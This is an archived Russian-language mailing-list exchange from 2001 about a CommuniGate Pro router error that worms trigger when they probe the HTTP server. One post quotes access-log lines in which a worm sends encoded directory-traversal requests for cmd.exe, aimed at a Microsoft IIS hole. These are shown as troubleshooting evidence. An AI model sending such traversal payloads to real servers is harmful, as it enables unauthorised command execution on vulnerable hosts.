Re: Что такое?

От: Dmitry Valdov <dv_at_mx_ru>
Дата: Tue 25 Sep 2001 - 10:28:01 MSD

On Tue, 25 Sep 2001, Dmitry Akindinov, Stalker Labs wrote:

> Date: Tue, 25 Sep 2001 10:21:59 +0400
> From: "Dmitry Akindinov, Stalker Labs" <dimak@stalker.com>
> Reply-To: CGatePro@mx.ru
> To: CGatePro@mx.ru
> Subject: [CGP] Re: Что такое?
>
> Hello,
>
> On Tue, Sep 25, 2001, 06:08:41 GMT
> Dmitry Valdov, <dv@dv.ru> wrote:
>
> > On Mon, 24 Sep 2001, Vladimir A. Butenko wrote:
> >
> > > Date: Mon, 24 Sep 2001 16:14:36 -0700
> > > From: "Vladimir A. Butenko" <vladimir_butenko@stalker.com>
> > > Reply-To: CGatePro@mx.ru
> > > To: CGatePro@mx.ru
> > > Subject: [CGP] Re: Что такое?
> > >
> > > On Tue, 25 Sep 2001 08:57:17 +1100
> >
> > > > Здравствуйте! Появилась странная надпись, [ ROUTER failed to
> > > > route 'LoginPage@www' ]
> > > > что это такое и как с ним бороться?
> > >
> > > Это к Вашему HTTP серверу обращаются (всякие вирусы) с URL вида:
> > > http://www/.....
> > >
> > > Вроде как у Microsoft IIS сервера на такие URL дырка, вот они и пробуют...
> > >
> >
> > А почему такая странная диагностика?
>
> Потому что домен с именем www (без какой-либо квалификации) не определен на
> вашем сервере. LoginPage - это псевдо-аккаунт, который используется сервером
> для роутинга URL-ей HTTP запросов.
Хмм. Не совсем понял термин "роутинг URL-ей HTTP запросов." Можно чуть подробнее?

А вот примеры запросов этого вируса-червя: 

arabia.access.ch - - [25/Sep/2001:10:10:12 +0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 321
arabia.access.ch - - [25/Sep/2001:10:10:12 +0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 321
arabia.access.ch - - [25/Sep/2001:10:10:13 +0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
arabia.access.ch - - [25/Sep/2001:10:10:13 +0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338

Вроде как нет тут обращения к домену www.

Dmitry. 

##################################################################
Вы получили это сообщение потому, что подписаны на список рассылки   <CGatePro@mx.ru>. 
Чтобы отписаться, отправьте сообщение на адрес <CGatePro-off@mx.ru>
Чтобы переключиться в режим дайджеста - mailto:<CGatePro-digest@mx.ru>
Чтобы переключиться в индексный режим - mailto:<CGatePro-index@mx.ru>
Для административных запросов адрес <CGatePro-request@mx.ru> Получено Tue Sep 25 06:27:59 2001

Этот архив был сгенерирован hypermail 2.1.8 : Fri 24 Apr 2015 - 16:12:22 MSK